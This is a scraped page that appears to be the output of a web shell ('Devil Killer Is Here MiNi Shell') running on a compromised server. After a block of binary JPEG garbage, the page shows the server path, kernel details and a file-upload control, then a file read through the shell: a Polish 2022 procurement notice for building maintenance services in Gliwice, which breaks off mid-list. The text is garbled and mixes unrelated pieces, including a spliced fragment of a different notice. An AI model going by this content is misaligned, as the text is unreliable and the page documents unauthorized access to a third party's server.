JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221203/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221203/0047460701-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> wykonywanie usług w zakresie całodobowej obsługi technicznej zasobów TBS, zasobów własnych oraz zasobów komunalnych administrowanych przez Zarząd Budynków Miejskich I TBS Sp. z o.o. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zarząd Budynków Miejskich I Towarzystwo Budownictwa Społecznego Sp. z o.o.</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 276567632</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Dolnych Wałów 11</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gliwice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">44-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL229 - Gliwicki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">bartlomiej.jurkiewicz@zbmgliwice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zbmgliwice.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Budownictwo i obiekty komunalne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> wykonywanie usług w zakresie całodobowej obsługi technicznej zasobów TBS, zasobów własnych oraz zasobów komunalnych administrowanych przez Zarząd Budynków Miejskich I TBS Sp. z o.o. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-417fa563-7322-11ed-abdb-a69c1593877c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00474607</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-12-03</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.Wpostępowaniuoudzieleniezamówienia komunikacja między Zamawiającym<br/>aWykonawcamiodbywasiędrogąelektroniczną<br/>przyużyciuminiPortaluhttps://miniportal.uzp.gov.pl,ePUAPuhttps://epuap.gov.pl/wps/portal</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do formularzy:<br/>złożenia, zmiany, wycofania oferty lub wniosku oraz do formularza do komunikacji. Wymagania<br/>techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej przekazywanej przy ich<br/>użyciu, opisane zostały w Regulaminie korzystania z miniPortal<br/>udostępnympodadresemhttps://miniportal.uzp.gov.pl/WarunkiUslugi.aspx oraz Regulaminie<br/>ePUAP. Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia<br/>publicznego, akceptuje warunki korzystania z miniPortalu, określone w Regulaminie miniPortalu oraz<br/>zobowiązuje się korzystając z miniPortalu przestrzegać postanowień tego regulaminu. Maksymalny<br/>rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia i wycofania<br/>oferty oraz dokomunikacjiwynosi150 MB. Za datę przekazania oferty, oświadczenia, o którym mowa w<br/>art. 125ust.1pzp,podmiotowych środków dowodowych, przedmiotowych środków dowodowych<br/>oraz innych informacji, oświadczeń lub dokumentów, przekazywanych w postępowaniu, przyjmuje się<br/>datę ich przekazania na ePUAP. W postępowaniu o udzielenie zamówienia korespondencja<br/>elektroniczna(inna niż oferta Wykonawcy i załączniki do oferty) odbywa się elektronicznie za<br/>pośrednictwem dedykowanego formularza dostępnego na ePUAP oraz udostępnionego przez<br/>miniPortal (Formularz do komunikacji).Korespondencja przesłana za pomocą tego formularza nie może<br/>być szyfrowana. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i<br/><br/>Wykonawcy posługują się numerem ogłoszenia (BZP). Zamawiający może również komunikować się z<br/>Wykonawcami za pomocą poczty elektronicznej, email: bartlomiej.jurkiewicz@zbmgliwice.pl Dokumenty<br/>elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń składane są przez<br/>Wykonawcę za pośrednictwem Formularza do komunikacji jako załączniki. Zamawiający dopuszcza<br/>również możliwość składania dokumentów elektronicznych, oświadczeń lub elektronicznych kopii<br/>dokumentów lub oświadczeń za pomocą poczty elektronicznej, na<br/>adres email bartlomiej.jurkiewicz@zbmgliwice.pl Sposób sporządzenia dokumentów elektronicznych,<br/>oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi być zgody z wymaganiami<br/>określonymi w Rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu<br/>sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych<br/>oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub<br/>konkursie (Dz. U.z 2020 r. poz. 2452).Zamawiający nie przewiduje sposobu komunikowania się z<br/>Wykonawcami w inny sposób niż przy użyciu środków komunikacji elektronicznej, wskazanych w SWZ.<br/>Korzystanie przez Wykonawcę ze wskazanej platformy jest bezpłatne.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L119z04.05.2016, str. 1), dalej „RODO”, informuję, że:1.1. administratorem Pani/Pana danych<br/>osobowych jest Zarząd Budynków Miejskich I Towarzystwo Budownictwa Społecznego Sp. z o.o. z<br/>siedzibą w Gliwicach (kod pocztowy 44-100) przy ul. Dolnych Wałów 11;1.2. w sprawach związanych z<br/>Pani/Pana danymi proszę kontaktować się z Inspektorem Ochrony Danych, kontakt pisemny za pomocą<br/>poczty tradycyjnej na adres: Zarząd Budynków Miejskich I Towarzystwo Budownictwa Społecznego<br/>Sp. z o.o.,44-100 Gliwice, ul. Dolnych Wałów 11 lub pocztą elektroniczną na adres<br/>email:iod@zbmgliwice.pl1.3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6ust. 1<br/>lit.c RODO w celu prowadzenia przedmiotowego postępowania o udzielenie zamówienia publicznego<br/>oraz zawarcia umowy, a podstawą prawną ich przetwarzania jest obowiązek prawny stosowania<br/>sformalizowanych procedur udzielania zamówień publicznych<br/>spoczywającynaZamawiającym;1.4.OdbiorcamiPani/Pana danych osobowych będą osoby lub<br/>podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74<br/>ustawy z dnia 11września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 2019 z późn.<br/>zm.), dalej„ustawaPzp”;1.5. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1<br/>ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas<br/>trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;1.6.<br/>obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących<br/>jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w<br/>postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych<br/>wynikają z ustawyPzp;1.7. w odniesieniu do Pani/Pana danych osobowych decyzje nie będą<br/>podejmowane w sposób zautomatyzowany, stosowanie do art. 22RODO;1.8. posiada Pani/Pan:1.8.1.<br/>na podstawie art.15RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;1.8.2. na<br/>podstawie art.16RODO prawo do sprostowania Pani/Pana danych osobowych, przy czym skorzystanie<br/>z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie<br/>zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz<br/>nie może naruszać integralności protokołu oraz jego załączników.1.8.3.na podstawie art. 18 RODO<br/>prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18ust. 2 RODO, przy czym prawo do ograniczenia przetwarzania<br/>nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków<br/>Ogłoszenie nr 2021/BZP 00010443/01 z dnia 2021-02-24<br/>2021-02-24 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy - Roboty budowlane<br/>ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne<br/>względy interesu publicznego Unii Europejskiej lub państwaczłonkowskiego.1.8.4. prawo do wniesienia<br/>skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących naruszaprzepisyRODO;1.9. nie przysługuje Pani/Panu:1.9.1. w<br/>związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danychosobowych;1.9.2. prawo do<br/>przenoszenia danych osobowych, o którym mowa w art.20 RODO;1.9.3. na podstawie art. 21 RODO<br/>prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6ust.1 lit.c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">201/PZ/2022/ZBM</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zgodnie z SWZ:<br/>1.	Przedmiotem zamówienia jest wykonywanie usług w zakresie całodobowej obsługi technicznej zasobów TBS, zasobów własnych oraz zasobów komunalnych administrowanych przez Zarząd Budynków Miejskich I Towarzystwo Budownictwa Społecznego Sp. z o.o. w Gliwicach.<br/>3.	Szczegółowy zakres zamówienia w ramach zasobów komunalnych określa wzór umowy wraz z załącznikami, który stanowi załącznik nr 6 do niniejszej SWZ, szczegółowy zakres zamówienia w ramach zasobów własnych i TBS określa wzór umowy wraz z załącznikami, który stanowi załącznik nr 6a do niniejszej SWZ. Tym samym Wykonawca zobowiązany będzie do zawarcia dwóch oddzielnych umów, zgodnie z przedstawioną ofertą.<br/>4.	W ramach zasobów własnych i TBS zamówienie będzie rozliczane ryczałtem za 1m2 powierzchni lokalu mieszkalnego i użytkowego (bez kosztów materiału) z zastrzeżeniem zasad określonych w załączniku nr 1 do umowy. Do rozliczenia zostanie dodana wartość uzyskana z rozliczenia materiałów zużytych do wykonania robót, zgodnie z założeniami umowy. Ponadto zamówienie obejmować będzie wykonanie innych niż określone w załączniku nr 1 do umowy, uzasadnionych czynności; Wykonawcy przysługuje z tego tytułu wynagrodzenie rozliczane według oddzielnych zleceń i średnich cen opublikowanych przez SEKOCENBUD na dany kwartał, w którym wystawiane jest zlecenie, zgodnie z treścią umowy.<br/>5.	W ramach zasobów komunalnych zamówienie będzie rozliczane według niżej wymienionych zasad, w oparciu o załączone wykazy, stanowiące załączniki do umowy:<br/>a)	ryczałtem za 1m2 powierzchni lokalu mieszkalnego w budynkach stanowiących 100% własność Gminy Gliwice, z wyłączeniem zleceń, których wartość jest wyższa niż kwota 500,00zł + VAT, według zasad określonych w §6 pkt.2 umowy. Uwaga: przedstawiony sposób rozliczenia obejmuje wykonane usługi zarówno w lokalach jak i części wspólnej budynku. Do kwoty zostanie doliczona wartość uzyskana z miesięcznego rozliczenia materiałów zużytych do wykonania robót.<br/>b)	ryczałtem za 1m2 powierzchni w budynku przy ul. Jasnej 31b w Gliwicach (jedynie w okresie od stycznia do czerwca 2023). Do kwoty zostanie doliczona wartość uzyskana z miesięcznego rozliczenia materiałów zużytych do wykonania robót<br/>c)	ryczałtem usług określonych w §2 ust.3 projektu umowy (załącznik nr 6 do SWZ) w budynku przy ul. Jasnej 31B, według stałej opłaty miesięcznej; jedynie w okresie od stycznia do czerwca 2023,<br/>d)	oddzielnym zleceniem (robocizna + materiał) w lokalach użytkowych w budynkach stanowiących 100% własność Gminy Gliwice; w Gminnych lokalach mieszkalnych i użytkowych w budynkach Wspólnot Mieszkaniowych; w lokalach mieszkalnych w budynkach stanowiących 100% własność Gminy Gliwice gdzie wartość usługi jednostkowej jest wyższa od kwoty 500,00zł + VAT.<br/>6.	Kosztorysy należy wykonywać zgodnie z obowiązującym „Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego” (Dz. U. nr 130 poz. 1389).<br/>7.	Dokładne wykazy adresowe zostaną dostarczone Wykonawcy realizującemu przedmiotowe zamówienie w dniu podpisania umowy. <br/>8.	Wykonawca we własnym zakresie organizuje system przyjmowania zleceń, zapewnia dojazd do klienta; dostarcza niezbędny sprzęt, narzędzia oraz materiały do wykonania przedmiotowej usługi. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50700000-2 - Usługi w zakresie napraw i konserwacji instalacji budynkowych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90500000-2 - Usługi związane z odpadami</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-01-01 do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Spełnia/nie spełnia</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena za usługę rozliczaną oddzielnymi zleceniami</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja i rękojmia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>2.1.	Zdolności do występowania w obrocie gospodarczym.<br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/>2.2.	Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów.<br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/>2.3.	Sytuacji ekonomicznej lub finansowej.<br/>2.3.1.	W celu spełnienia warunku Wykonawca musi wykazać, iż posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną minimum 900.000,00zł;<br/>2.3.2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy wykażą się posiadaniem środków finansowych lub zdolności kredytowej w wysokości nie mniejszej niż 50.000,00zł [słownie: pięćdziesiąt tysięcy złotych], potwierdzonym informacją banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem. W przypadku złożenia przez Wykonawców dokumentów zawierających kwoty wyrażone w innych walutach niż PLN, dla potrzeb oceny spełniania warunku określonego powyżej, Zamawiający jako kurs przeliczeniowy waluty przyjmie średni kurs danej waluty publikowany przez Narodowy Bank Polski w dniu publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych. Jeżeli w dniu publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych, Narodowy Bank Polski nie publikuje średniego kursu danej waluty, za podstawę przeliczenia przyjmuje się średni kurs waluty publikowany pierwszego dnia, po dniu publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych, w którym zostanie on opublikowany.<br/>2.4.	Zdolności technicznej lub zawodowej.<br/>2.4.1.	O udzielenie zamówienia publicznego mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące zdolności technicznej i zawodowej. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia. Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, zrealizował lub aktualnie realizuje zamówienia (na podstawie umowy) o charakterze i złożoności porównywalnej z przedmiotem zamówienia.<br/>Należy wykazać minimum 3 usługi (trzy oddzielne zamówienia) dotyczące wykonywania całodobowej obsługi technicznej/pogotowia technicznego u jednego odbiorcy, w tym minimum 2 zamówienia w zasobie mieszkaniowym o obsługiwanej łącznej powierzchni użytkowej minimum 110000m2 i wartości rocznej nie mniejszej niż 500.000,00zł.<br/>Zamawiający uzna usługę (jako jedno potwierdzenie) realizowaną na podstawie oddzielnych umów w ramach jednego zamówienia, u tego samego odbiorcy, w tym samym czasie.<br/>Zamawiający będzie dokonywał oceny spełnienia tego warunku na podstawie wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie – z wykorzystaniem załączonego wzoru stanowiącego załącznik nr 4 do SWZ.<br/>2.4.2.	Dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia.<br/>W zakresie „dysponowania odpowiednim potencjałem technicznym”: Wykonawca winien wykazać dysponowanie minimum następującym sprzętem, wyposażeniem oraz środkami organizacyjno-technicznymi:<br/>•	minimum 2 urządzenia do mechanicznego czyszczenia i udrożnienia kanalizacji WUKO) o ciśnieniu roboczym min. 140 bar i co najmniej 1 zestaw kamer do monitoringu sieci kanalizacyjnych,<br/>•	minimum 2 podnośniki koszowe (w tym co najmniej jeden o wysokości podnoszenia do 24m),<br/>•	minimum 4 pojazdy osobowo-towarowe ze względu na realizację kilku zleceń jednocześnie,<br/>•	minimum 2 urządzenia do kontroli 